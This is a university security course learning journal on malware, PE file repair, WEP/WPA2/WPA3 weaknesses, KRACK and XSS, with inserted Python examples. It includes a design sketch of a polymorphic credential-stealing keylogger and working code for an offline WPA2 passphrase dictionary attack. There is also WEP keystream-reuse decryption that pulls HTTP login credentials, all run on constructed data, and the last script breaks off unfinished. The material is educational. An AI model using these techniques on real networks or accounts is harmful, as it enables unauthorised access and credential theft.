Final Learning Journal

System and Application Security

Juan Fernando Giraldo Botello

Student Number: 612833

Department of Future Technologies

November 2019
Table of Contents

1. Introduction
2. An overview of Malware
2.1. Malware situation of the world
2.2. What has changed between the MS reports?
2.3. Design of a sophisticated piece of malware
3. A closer look into Viruses
3.1. Fixing a PE file
4. Getting to know WLAN
4.1. WPA2/3 Information
4.2. Harmfulness of KRACK attacks
4.3. Current situation of the 4-way handshake
4.4. What is new in WPA3?
4.5. Recovering lost credentials
4.6. Analysis of Defcon22 conference
5. Exploits and countermeasures
5.1. What is a Man-in-the-browser attack?
5.2. Know Advanced persistent threat and targeted attacks
5.3. What is XSS?
5.4. IOT and common vulnerabilities
6. Software and system security
6.1. Security tools and mechanisms
6.2. What is Ransomware?
6.3. How malware makes itself invisible to antimalware software?
6.4. System functionality, attack propagation and detection in dependent systems
7. Conclusion
8. References
9. Appendices
9.1. Minutes of the meeting #4
1. Introduction
The present document is the final assignment for the course System and Application
Security. It is a compilation of multiple weekly reports written over the past two
months using the knowledge acquired in the lectures, independent research and
discussion in group meetings. The contents of the reports vary from one to another
according to the topic of the lectures and the activities assigned by the professors
every week. The learning journal covers multiple topics in cyber-security and
networks.
The first topic addressed is malware in general and its impact on the world; then
viruses are explained and a practical exercise is presented to help understand the
topic. The third subject reviewed is WLAN: basic information is presented and a
practical example of the vulnerabilities of a network is also worked through. Next,
exploits and countermeasures are described with different examples of situations
where these topics have been present. Lastly, software security is described and
researched.

The team for the weekly meetings was number 12, made up of Melissa Welander,
Fredrik Brushane, Heta Pärssinen, Luke Skeen and Juan Giraldo. Five group meetings
took place during the academic period: the first one on September 12 at 8:00 in the
Natura building, the second on September 19 at 10:00 in the Natura building, the
third on September 26 at 10:00 in the Natura building, the fourth on October 10 at
10:00 in the Quantum building (I was the chairperson in this meeting), and the last
one on October 17, also in the Quantum building, at 18:00.

In today's society information is everything, and those who possess a great amount
of information tend to use it to make a large profit. That is why a massive number
of services and devices capable of managing information efficiently have been
developed over the last few years, and nowadays they are a vital part of the
everyday life of almost every person in the world. These information services
contain every kind of valuable data, from medical records and banking credentials
to nuclear launch codes. Because of the value of the information inside the systems,
every day people try to break into devices and use different techniques to steal
private information. Therefore, a great amount of research and many breakthroughs
in the area of information security have been made; some of the methodologies,
techniques and tools are presented in this journal. The subjects addressed in the
course, and therefore presented in this work, are of great relevance for a software
engineering student who is developing a knowledge base in cyber-security.

My expectations for the course were high: I was very interested in learning about
different mechanisms to defend against the multiple threats users encounter every
day on the web, and in understanding in more depth how cyber-criminals manage to
penetrate and affect different technological devices. Before taking the course I had
some knowledge about security and attacks thanks to a research project I did back
at my home university. The research was about implementing a methodology to detect
web defacement attacks. During the project I learned about attack vectors, web
architectures, countermeasures to web attacks and some exploits such as SQL
injection and XSS attacks.
One could say I already had the base knowledge about some of the topics covered
by the course, but still, all the information presented by the lecturers was of great
importance for developing a deeper understanding of each topic and for creating a
connection between them.
2. An overview of Malware
This report addresses mainly information security topics, more specifically malware
and its presence in our society. Information about the evolution and present
situation of malware in the world is covered, along with descriptions and examples
of some of the most relevant pieces of malware nowadays. To give an accurate
insight into the evolution of malware, a comparison between two official Microsoft
security reports is presented. Finally, a detailed description of a made-up virus is
given in order to replicate the process of designing a complex piece of malware.

2.1. Malware situation of the world


At present, malware attacks are becoming very common and hard to detect in time;
they range from something relatively harmless such as adware to an actual danger
such as ransomware. Some of the most important anti-malware companies use the
data they gather about attacks to produce real-time malware maps. In order to
analyse the malware situation of the world, the map of attacks from Kaspersky was
checked for three days in a row, focusing on three aspects: the countries with the
most attacks, the countries with the fewest attacks and the situation in Finland. It
was found that Russia, China, Germany, the United States and Brazil were the most
attacked countries throughout the three days of the analysis. Regarding the second
aspect, the most peaceful countries were Finland, Sweden, Norway, Denmark and
Canada. Finally, the observations showed that Finland suffered very few attacks per
day, even fewer than Sweden, Norway and Denmark, making it the safest among the
Nordic countries.

All the information showcased on the map is gathered by Kaspersky through its
multiple anti-malware services: On-Access Scan (OAS), On-Demand Scan (ODS), Web
Anti-virus (WAV), Mail Anti-virus (MAV), Intrusion Detection Scan (IDS), Vulnerability
Scan (VUL), Kaspersky Anti-Spam (KAS) and Botnet Activity Detection (BAD). Taking
this into consideration, the malware information can be considered accurate for
what it measures, but since it is only Kaspersky's own telemetry the map is not fully
representative: it counts detections on machines running Kaspersky products, so
countries with a large Kaspersky install base appear more attacked, and not
everyone in the world uses Kaspersky as their main anti-malware software.
Information about the most dangerous current pieces of malware was also collected
in order to get a better perspective of the potential threats people can run into
while using an electronic device. A table was made to present some of the most
dangerous malicious software researched (Table 1). At the top of this table is the
ransomware WannaCry, which in May 2017 encrypted the data of unpatched Windows
computers, spreading on its own through the EternalBlue exploit for the SMBv1
vulnerability fixed by Microsoft's MS17-010 update; the objective of the cybercriminals
who created it was to demand money to release the hijacked information. This piece
of malware affected more than two hundred thousand computers all over the world,
and among the victims were hospitals, airports, phone and gas companies. This is
why this malicious software is at the top of the table: it actually compromised vital
information needed to keep people alive.

Name             OS/Application    Type               Information
WannaCry         Win32             Ransomware         Encrypts the victim's data and requests payment to release it.
Emotet           Win32             Trojan             Polymorphic banking trojan aimed at stealing account information; later versions also act as a loader for other malware.
FBI Virus        Win32             Ransomware         Locks the victim's PC, impersonating the FBI and requesting money to unlock the computer.
Loyphish         Any web browser   Phishing           Password-stealing website.
Suspicious.Emit  Win32             Trojan             Hides folders and files on the victim's PC.
Sirefef          Win32             Trojan (rootkit)   Also known as ZeroAccess; downloads fake applications and other malware.
Kovter           Win32             Trojan             Downloads malware onto a PC; later versions run fileless from the registry.
ZeuS             Win32             Trojan             Steals sensitive information, above all banking credentials, from a PC.
Dridex           Win32             Trojan (banking)   Spread by macro-laden Office documents; installs keyloggers and injects code into the browser to steal banking credentials.
Gh0st            Win32             Trojan (RAT)       Remote access trojan that gives the attacker full control of the infected PC.

Table 1. Most dangerous malicious software

2.2. What has changed between the MS reports?


To understand the evolution of malware in the world, two Microsoft security reports
were read and compared: the ten-year special edition of 2012 and the most recent
one of 2018. Two key points were taken into consideration when the material was
reviewed: the evolution of malware attacks and the variation in the most attacked
countries. First, in the 2012 report the most used malware were trojans, worms and
miscellaneous unwanted software, but in the 2018 report the common threats were
ransomware, cryptocurrency miners and phishing attacks. Next, the countries with
the most infections back in 2012 were Turkey, Korea, Brazil, Taiwan and Spain, but
according to the 2018 report these are now Ethiopia, Pakistan and Palestine. One of
the main reasons for this evolution is the development of technology: many patches
and fixes were developed to stop the harm of the most common threats of the time,
and most developed countries started to invest larger amounts of money in cyber
security. Another aspect to take into consideration is the migration of everyday
services to digital platforms, for example banking and social security; this situation
changed the focus of the cybercriminals and the attack vectors they used to rely on.
2.3. Design of a sophisticated piece of malware
It was decided to design a sophisticated piece of malware in order to help improve
our general understanding of malicious software. Considering that nowadays the
video game industry is one of the biggest in the world, with more than 40 billion
dollars of revenue per year, the proposed malware was aimed specifically at this
industry. In general terms, it targets online video game players in order to steal
their game account credentials. The malware is made to generate money by selling
the players' account information to the highest bidder.

The malware was conceived as a keylogger virus which targets Windows 32- or 64-bit
operating systems and infects the executable file of a video game to steal the
account credentials of the player (Figure 1). The virus is integrated into the game
launcher's code by overwriting the parts of the file that contain zeros, spaces or
padding (a cavity infection), so the file size and section layout do not change,
which makes it harder for anti-malware software to notice. The malware is placed on
the host machine when the user installs a third-party program that provides in-game
information but also serves as a container (dropper) for the virus. From then on,
whenever the launcher is executed the keylogger is activated and ready to capture
the player's account information by recording the user's keystrokes (Figure 2). The
virus only needs to survive in the system until the executable file of the game is
run for the first time after the infection.

The virus hides from scanners by encrypting its code and mutating on each infection
(polymorphism), so the instructions perform the way they are intended to but with a
different implementation every time. Whenever the user launches the game, the virus
decrypts itself using the previously generated key and is ready to capture data when
the player logs in to his account. One way to defend against the virus is two-step
verification on login, which is usually offered by the game companies: a captured
password alone is then not enough to take over the account. Another is configuring
the anti-malware software to check the game launcher specifically and to verify its
integrity (hash or publisher signature) after every update. Changing the password
frequently, on the other hand, helps little here, since the keylogger simply captures
the new password as well; two-step verification is the most effective
countermeasure against this malware.
Figure 1. Malware structure

Figure 2. Malware functionality


3. A closer look into Viruses
Personally, I found the topic of computer viruses very interesting and important
because, given the current state of technology, getting infected is as easy as
clicking a link to an unknown web page. And taking into consideration the incredibly
harmful consequences that a virus can create, it is always good to be aware of the
threats and how they work. I was very glad to learn about the types of viruses
currently in existence, because you normally hear about how viruses merge with a
program, but you do not know how they do it or which techniques they use. Learning
about how viruses hide from anti-malware software was also very useful; this helps
you understand the inner workings of a virus and how it can be spotted even without
an antivirus.

It was of great help to see examples of every hiding technique, because having a
practical implementation makes the methods much easier to understand. In addition,
the section about detection methods for viruses was the most useful of all: due to
the annual growth and evolution of technology new hiding methods are developed,
each time more complex and ingenious than the last, which is why knowing multiple
detection techniques comes in handy for defending against these threats that
attempt to harm our integrity.

3.1. Fixing a PE file


To acquire deeper knowledge about computer viruses, it was decided to analyse and
repair a PE file that had been attacked by a virus; the threat had been removed from
the file, but the executable was left completely useless. The first thought was that
a parasitic virus replaced some part of the code, and that when the malware was
removed so was that code, leaving the software without a chunk of its instructions.
Another option is that some of the virus code is still inserted in the file, causing
it to malfunction.

The first step in addressing this problem was to try to execute the file. It was run
on a computer running Windows 10, but every time the file was clicked a warning was
shown saying that the application cannot be run in Win32 mode (Image 1). In order to
try the file on another operating system, a program called WineBottler, which allows
the execution of Windows applications on macOS, was installed on a MacBook Pro. It
was a surprise to find that, without changing any configuration of the file, it
executed correctly in the Mac environment (Image 2). Knowing that the file can be
executed properly without making any corrections to the code suggests that the main
structure of the PE file was not altered and that the problem must lie in some part
of the file's configuration that Wine tolerates or fixes by itself. It was decided to
explore the contents of the executable more closely in order to understand what is
happening inside.

Image 1. Result of executing the .exe file on Windows

Image 2. Result of executing the .exe file on MacOS

Using a PE viewer it was possible to identify the sections of the mystery file. It is
divided into the DOS_HEADER, the DOS_STUB, the NT_HEADERS (containing the PE file
signature, the PE file header and the PE optional header) and the SECTION_HEADER,
which defines an array of 7 entries for the .text, .rdata, .data, foobar1, foobar2,
foobar3 and .rsrc sections (Image 3). At the end it has the IMPORT_DESCRIPTOR and
the DIRECTORY_TABLE. This confirms that the structure of the file is intact, so the
virus must have changed the content of one of the sections. Something to notice is
that the file is digitally signed; these signatures are used by software publishers
to identify the executable file as theirs, and a valid signature ensures the
authenticity and the integrity of a PE file. Looking deeper into the signature it was
found that the signer was "SysTApplSecur rulz OK!" and that the signature is not
valid, meaning there is a high chance the digital signature was modified by the virus
and the current one is not the original. Taking into consideration that the bytes of
a signature block can be altered with nothing more than a hex editor (which
invalidates the signature rather than forging a valid one), deciding to execute a PE
file based only on the presence of a digital signature is not a good decision; only a
signature that verifies against a trusted publisher certificate means anything.

Image 3. The .exe file opened in a Hex editor

Making use of the hex editor built into the PE viewer it was possible to explore the
contents of each of the sections in the file, and some useful information was found
inside. The first thing to notice is that the file contains an MZ header, which
confirms the executable file is MS-DOS-compatible. The PE header is also present in
the hex dump, as are the section header definitions, meaning that the content of
these parts is correct. These headers were followed by a long padding of zeros; for
some unknown reason the hex editor highlighted this region in red, as if it were not
supposed to be there. A region declaring what looked like error log messages,
followed by a charset table and a calendar format, appeared legitimate and not
tampered with by the malware. Two parts of the file were especially striking. The
first one was a series of strings saying "Hello from Sys-AppSec test application";
there were two of these separated by three zero bytes, but at the end of the second
string there were also three zero bytes followed by the letter "H", which raised the
suspicion that another string was missing. The other striking part was almost at the
end of the file: it consisted of multiple copies of the phrase "SystApplSecur rulz
OK!". Considering that this is the same text as the digital signature of the
executable file, and that the signature was very possibly changed by the virus, the
text looked as if it had been planted by the malware.

Using the information collected, some strategies were developed to fix the PE file.
The first approach was deleting the padding found after the PE header in the hex
file; this not only did not fix the issue but left the file completely useless, to
the point that Windows would not even recognise it as an .exe file. With this, the
theory that the virus might have left some padding that could be removed to fix the
file fell apart. Next, the text containing the "Hello from Sys-AppSec test
application" phrase was addressed: this region looked like it had an unfinished
pattern, so it was decided to complete it by overwriting some of the current bytes
with the ones that completed the pattern. Unfortunately, this procedure did not fix
the application, but unlike the previous method it did not leave the file useless
either.

Another approach was to delete the text containing the words "SystApplSecur rulz
OK!", based on the premise that the digital signature had been altered by the
malware; this method did not fix the application either. Knowing that some viruses
insert themselves into padding, it occurred to us that the text previously mentioned
might not need to be deleted but rather replaced with zeros; unfortunately this did
not work either. At this point it was decided to investigate further how WineBottler
executes PE files, but due to the lack of documentation for that software it was
impossible to get any valuable information that could have been used to fix the
application. In the end the file was not fixed, but that task is left for future
work based on this research.
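The two things this exercise leans on, the PE header layout (DOS header, PE signature, COFF file header, optional header with its data directories, section table) and the zero-filled padding that a cavity-infecting virus such as the one designed in section 2.3 would overwrite, can be checked without a GUI PE viewer. The Python script below is an added example, not part of the original journal nor of any tool mentioned in it: it walks the headers of a PE image, lists its sections, finds zero-filled cavities inside the sections' raw data, and reports whether the optional header's security directory (entry 4, where an Authenticode signature lives) is populated. The image it inspects is constructed inside the script (three sections and a placeholder certificate blob) so that it runs offline; it is not the course's mystery file, and the script only reports the presence of a signature block, it does not verify one.

```python
import struct

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
SECURITY_DIR = 4                       # IMAGE_DIRECTORY_ENTRY_SECURITY

def parse_pe(data):
    """Walk DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unknown optional header magic %#x" % magic)
    # data directories start at +96 (PE32) or +112 (PE32+); their count sits 4 bytes before them
    dirs = opt + (96 if magic == PE32_MAGIC else 112)
    ndirs = struct.unpack_from("<I", data, dirs - 4)[0]
    sig_off, sig_len = 0, 0
    if ndirs > SECURITY_DIR:           # the security entry holds a file offset, not an RVA
        sig_off, sig_len = struct.unpack_from("<II", data, dirs + 8 * SECURITY_DIR)
    sections = []
    for i in range(nsec):
        name, vsize, va, rsize, rptr, *_ = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\x00").decode("ascii"), "vsize": vsize, "va": va,
                         "raw_size": rsize, "raw_ptr": rptr,
                         "slack": max(0, rsize - vsize)})   # bytes on disk beyond what gets mapped
    return {"machine": machine, "pe32plus": magic == PE32PLUS_MAGIC,
            "sections": sections, "signature": (sig_off, sig_len)}

def find_cavities(data, sections, min_len=64):
    """Return (section, file offset, length) for every run of zero bytes >= min_len in raw data."""
    caves = []
    for s in sections:
        blob = data[s["raw_ptr"]:s["raw_ptr"] + s["raw_size"]] + b"\x01"   # sentinel closes a trailing run
        start = None
        for i, byte in enumerate(blob):
            if byte == 0 and start is None:
                start = i
            elif byte != 0 and start is not None:
                if i - start >= min_len:
                    caves.append((s["name"], s["raw_ptr"] + start, i - start))
                start = None
    return caves

def build_sample_pe(with_signature=True):
    """Constructed PE32 image for the demo (not a real program): 3 sections, 0x200 file alignment."""
    nsec, opt_size, align, pe_off = 3, 224, 0x200, 0x80
    dos = bytearray(pe_off)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, pe_off)                 # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x014C, nsec, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 92, 16)                       # NumberOfRvaAndSizes
    layout = [(b".text", b"\x55\x89\xe5\x90" * 96),           # 0x180 bytes of "code", 0x80 of slack
              (b".rdata", b"constructed sample string\x00"),   # mostly padding
              (b".data", b"\xAA" * align)]                     # completely filled, no cavity
    first_raw = (pe_off + 4 + 20 + opt_size + nsec * 40 + align - 1) // align * align
    headers, body, rptr, va = bytearray(), bytearray(), first_raw, 0x1000
    for name, payload in layout:
        headers += struct.pack("<8sIIIIIIHHI", name, len(payload), va, align, rptr, 0, 0, 0, 0, 0x60000020)
        body += payload.ljust(align, b"\x00")
        rptr, va = rptr + align, va + 0x1000
    cert = b""
    if with_signature:                                        # WIN_CERTIFICATE header + placeholder body
        cert_body = b"NOT-A-REAL-PKCS7-BLOB-constructed-for-the-demo"
        cert = struct.pack("<IHH", 8 + len(cert_body), 0x0200, 0x0002) + cert_body
        struct.pack_into("<II", opt, 96 + 8 * SECURITY_DIR, rptr, len(cert))
    image = (dos + b"PE\x00\x00" + coff + opt + headers).ljust(first_raw, b"\x00")
    return bytes(image + body + cert)

def report(data):
    pe = parse_pe(data)
    return {"sections": [s["name"] for s in pe["sections"]],
            "signed": pe["signature"][1] > 0,
            "cavities": find_cavities(data, pe["sections"])}

if __name__ == "__main__":
    for signed in (True, False):
        print(report(build_sample_pe(signed)))
```

On a real file, a cavity of a few hundred bytes at the end of .text or .rdata is normal file-alignment slack; what is suspicious is a section whose slack is no longer zero-filled, or a populated security directory whose signature does not verify with a tool such as signtool or osslsigncode.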
4. Getting to know WLAN
I already knew the basics of wireless LAN, but it was helpful to receive an
introduction to this technology because I did not recall some topics very well, such
as the security mechanisms and WLAN communications. Also, it was very interesting
to see actual statistics about the WLAN security situation in some countries; for
example, in Romania one can see how they drastically improved the security of their
wireless networks in only 4 years. Personally, I found the review and description of
the different infrastructure attacks useful, because in the tech field you always
hear people talking about different wireless attacks, you know what they mean but
you do not know how they work, so it was nice to get to understand them more
deeply.

The most interesting topic reviewed in the past week was the different WLAN
protocols: WEP, WPA, WPA2, WPA3 and WPS. First, the explanation of WEP was
especially useful, because you get to understand how the first approach to wireless
security was developed, and you can also understand what went wrong and learn from
it so that these mistakes do not come back in the future. It was shocking to learn
that, although WEP has been deprecated for more than 16 years, some people are
still using it to "protect" their wireless networks. But it is good that in Finland
WEP is still covered by the law, so it gets a little bit of protection from that side.

Regarding the WPA protocols, it was interesting to learn about the evolution and
current state of this wireless security tool, especially how the original WPA was
cracked and how the second version was constructed as a fix for all the known
vulnerabilities; it was also nice to understand the improvements that the third
iteration of WPA is going to provide. Finally, I was able to learn about a new
network feature: last week was the first time I heard about WPS. Even though this is
considered a very insecure network security protocol, I find it a very clever idea
for addressing the problem of connecting to an AP, but sadly it was poorly executed.

4.1. WPA2/3 Information


Like most people in the tech world, I consider WPA2 a very secure system due to its
CCMP protocol, based on the AES encryption algorithm instead of the obsolete RC4.
The fact that no practical attack on AES itself is known gives users some
confidence, but WPA2 consists of more working parts that can be broken through
known weaknesses, such as the handling of the group temporal key (GTK) or the
EAPOL 4-way handshake. One example of an attack that abuses the GTK is Hole 196,
which takes advantage of the fact that the GTK is shared by every client of the
network (unlike the per-client PTKs) and uses that shared key to forge broadcast
frames, for example spoofed ARP replies that redirect other clients' traffic to the
attacker. Fortunately, this attack was not a big deal: it could be easily mitigated,
and the attacker needed to be an already authenticated user of the WPA/WPA2
network. Overall the attacks on WPA-CCMP are not that harmful and are easy to
avoid, thanks to the features provided by this standard.

4.2. Harmfulness of KRACK attacks


In my opinion the KRACK attacks are very critical because almost every device that
supports Wi-Fi was affected by this exploit and, as evidenced in the previous lecture,
people are not aware of this method. Using this technique is relatively easy: the
attacker only needs to be within range of the victim and must know how to perform
the attack, which is not a problem due to the multiple videos and tutorials
currently uploaded on the internet. The attack tricks the client into reinstalling an
already used session key, which resets the packet nonce; because CCMP reuses the
keystream whenever a nonce is reused, the attacker can decrypt traffic sent by the
client and, depending on the cipher and the implementation (TKIP, GCMP, or the
all-zero key bug in some Linux and Android clients), inject and forge packets as
well. This can lead to the theft of bank credentials, photos, videos and other
sensitive information whenever the application layer is not separately encrypted.
The one thing an attacker cannot do with KRACK is obtain the network password.

4.3. Current situation of the 4-way handshake


The 4-way EAPOL handshake for key exchange is not secure enough because, as seen
in the demonstration at the lecture, it is very easy to use it as a means to crack
the network password: the second handshake message carries a MIC computed from
the pre-shared key, so anyone who captures the exchange can test passphrase
guesses offline, as fast as their hardware allows. Unfortunately the handshake itself
cannot be avoided while using WPA2-PSK; what can be done is to make the offline
guessing useless by choosing a long random passphrase, by using 802.1X/EAP
(WPA2-Enterprise) instead of a shared passphrase, or by moving to WPA3, whose SAE
handshake does not expose anything that can be verified offline. A paper about the
security of the 4-way handshake was found and reviewed.

4.4. What is new in WPA3?


The main improvements of WPA3 are: better protection against brute-force attacks,
achieved by replacing the PSK handshake with Simultaneous Authentication of Equals
(SAE), which forces an attacker to interact with the network for every password
guess instead of guessing offline and also provides forward secrecy; individualised
data encryption on open networks (Opportunistic Wireless Encryption, marketed as
Wi-Fi Enhanced Open), which is very useful for hiding web traffic even in public
networks; and, in WPA3-Enterprise, a 192-bit security suite with stronger ciphers
and key lengths than the current WPA2 encryption.
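Why the handshake of section 4.3 is crackable offline, and what SAE in section 4.4 changes, is easiest to see by redoing the computation that Aircrack-ng or hashcat perform for every candidate passphrase. The Python below is an added example, not from the journal, the lecture or any tool named here: it derives the PMK with PBKDF2 as IEEE 802.11i specifies, expands it to the PTK with the 802.11i PRF, recomputes the MIC of the second EAPOL-Key message and compares it with the captured one. The "captured" handshake is constructed inside the script from a known passphrase, made-up MAC addresses and nonces, so the attack can be verified offline; the wordlist is constructed as well. Every guess costs only local CPU time and never touches the network, which is exactly what SAE takes away by tying each guess to a live exchange with the access point.

```python
import hashlib, hmac

# EAPOL hdr(4) + type(1) + key info(2) + key len(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFF = 81

def pmk_from_passphrase(passphrase, ssid):
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf(key, label, data, nbytes):
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]

def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PTK for CCMP (48 bytes = KCK | KEK | TK) from the PMK, both MAC addresses and both nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)

def eapol_mic(kck, frame):
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    zeroed = frame[:MIC_OFF] + b"\x00" * 16 + frame[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def build_msg2(snonce, key_data):
    """EAPOL-Key message 2 (supplicant -> AP) with the MIC field still zeroed."""
    body = (b"\x02"                                  # descriptor type: RSN
            + (0x010A).to_bytes(2, "big")            # key info: version 2, pairwise, MIC present
            + (16).to_bytes(2, "big")                # key length
            + (1).to_bytes(8, "big")                 # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + b"\x00" * 16                           # MIC placeholder
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type Key

def simulate_capture(passphrase, ssid, aa, spa, anonce, snonce):
    """Constructed stand-in for a sniffed handshake: the supplicant's message 2 with a valid MIC."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    frame = bytearray(build_msg2(snonce, b"\x30\x14" + b"\x01\x00" * 10))   # RSN-IE-shaped key data
    frame[MIC_OFF:MIC_OFF + 16] = eapol_mic(kck, bytes(frame))
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce, "msg2": bytes(frame)}

def crack(capture, wordlist):
    """Offline dictionary attack: recompute the message-2 MIC for each guess; no network needed."""
    target = capture["msg2"][MIC_OFF:MIC_OFF + 16]
    for guess in wordlist:
        pmk = pmk_from_passphrase(guess, capture["ssid"])
        kck = derive_ptk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["msg2"]), target):
            return guess
    return None

# constructed scenario: made-up SSID, MAC addresses, nonces and wordlist
SSID = "Constructed-Net"
AA, SPA = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
WORDLIST = ["password", "12345678", "correct horse", "letmein"]

if __name__ == "__main__":
    cap = simulate_capture("correct horse", SSID, AA, SPA, ANONCE, SNONCE)
    print("recovered passphrase:", crack(cap, WORDLIST))
```

The cost per guess is dominated by the 4096-round PBKDF2, which is why the defence under WPA2-PSK is passphrase length rather than any handshake setting, and why a GPU cracker is so effective against short ones.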

4.5. Recovering lost credentials


In order to recover the credentials of the router, some steps had to be followed.
First the contents of the provided traffic files were analysed using Wireshark;
unfortunately both were encrypted, which made it impossible to get any useful
information from them in their current state. Doing some research, it was found that
with the WEP key of the network the traffic in the file can be decrypted. So the
next step was to try to obtain the WEP key; it was decided to use Aircrack-ng to
crack the network using the IVs inside the files. A Linux distribution is needed to
run Aircrack-ng, so in this case an Ubuntu OS was set up in a virtual machine so the
program could be used to crack the key.

The larger file was the first one to be analysed by the software; it took less than a
second to get the WEP key from this file (Image 4). The second file did not produce
a key, the program could not crack it, but it did not matter because both files are
from the same network, so the first key should work for both of them. Using
Wireshark and the key it was possible to decrypt the contents of the
"encrypted_connection" file by adding a WEP decryption key in the IEEE 802.11
wireless LAN preferences. All that was left to do was to find the router credentials
inside the network traffic; fortunately the information provided in the problem
description stated that the credentials were stored in the browser, which means it
is very likely that they were used in an HTTP request to a web server. An HTTP filter
was applied in Wireshark to search for the credentials inside the packets. Right in
the Authorization header of the Hypertext Transfer Protocol information, the
username and the password were found (Image 5).
Image 4. Wep key in Aircrack-ng

Image 5. Router credentials in .pcap file
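The reason a capture of WEP traffic can be decrypted at all is the way WEP uses RC4: every frame is encrypted with RC4 keyed by a 24-bit IV prepended to the shared key, the IV is sent in clear, and with only 16 million IVs (many of them chosen badly by the cards) the same keystream gets reused. The Python below is an added example, not from the journal or from Aircrack-ng: it implements a toy WEP (RC4 over IV||key, no ICV) on constructed frames, shows that two frames sharing an IV leak the XOR of their plaintexts, recovers the keystream from one frame whose content the attacker knows (traffic the attacker provoked, or at least the constant LLC/SNAP header every IP frame starts with), decrypts the other frame with it, and then pulls the username and password out of the HTTP Basic Authorization header, the same place the router credentials were found in Image 5. The key, IV, frames and credentials are all made up for the demo. Aircrack-ng's actual key recovery (the statistical PTW/FMS attacks on the RC4 key schedule) is a different and stronger attack on the same design flaw, and KRACK in section 4.2 exploits the same keystream-reuse principle against CCMP by forcing a nonce to be reused.

```python
import base64, re

LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")   # constant start of every IP frame on 802.11

def rc4(key, nbytes):
    """Plain RC4: key schedule, then nbytes of keystream."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    while len(out) < nbytes:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(key, iv, plaintext):
    """Toy WEP frame: IV (3 bytes, in clear) || plaintext XOR RC4(IV || key). ICV omitted."""
    return iv + xor(plaintext, rc4(iv + key, len(plaintext)))

def wep_decrypt(key, frame):
    iv, body = frame[:3], frame[3:]
    return xor(body, rc4(iv + key, len(body)))

def keystream_from_known(frame, known_plaintext):
    """C XOR P = keystream: the attacker gets as many keystream bytes as plaintext bytes he knows."""
    return frame[:3], xor(frame[3:], known_plaintext)

def decrypt_with_reused_iv(frames, known_frame, known_plaintext):
    """Decrypt every captured frame that reuses the IV of a frame whose plaintext is known."""
    iv, ks = keystream_from_known(known_frame, known_plaintext)
    return [xor(f[3:], ks) for f in frames if f[:3] == iv and f != known_frame]

def extract_basic_auth(payload):
    """Pull user and password out of an HTTP Basic Authorization header in decrypted data."""
    m = re.search(rb"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", payload)
    if not m:
        return None
    user, _, password = base64.b64decode(m.group(1)).decode().partition(":")
    return user, password

# --- constructed scenario (made-up key, IV, traffic and credentials) ----------------------
KEY = bytes.fromhex("0f1a2b3c4d")                    # 40-bit WEP key
IV = b"\x01\x02\x03"                                 # the card reuses it for two frames
LOGIN = (LLC_SNAP_IP + b"\x45\x00" + b"GET /index.cgi HTTP/1.1\r\nHost: 192.168.1.1\r\n"
         b"Authorization: Basic " + base64.b64encode(b"admin:s3cret-demo") + b"\r\n\r\n")
# traffic whose content the attacker knows, e.g. the echo reply to a ping he sent, long enough to cover LOGIN
KNOWN = (LLC_SNAP_IP + b"\x45\x00" + b"attacker-chosen ping payload " * 8)[:len(LOGIN)]
CAPTURE = [wep_encrypt(KEY, b"\x09\x09\x09", LLC_SNAP_IP + b"\x45\x00" + b"unrelated"),
           wep_encrypt(KEY, IV, LOGIN),
           wep_encrypt(KEY, IV, KNOWN)]

def run_attack():
    """What the attacker gets without the key: the two same-IV frames leak P1 XOR P2, and the
    known frame turns that into the login frame's plaintext and the credentials inside it."""
    known_frame = CAPTURE[2]
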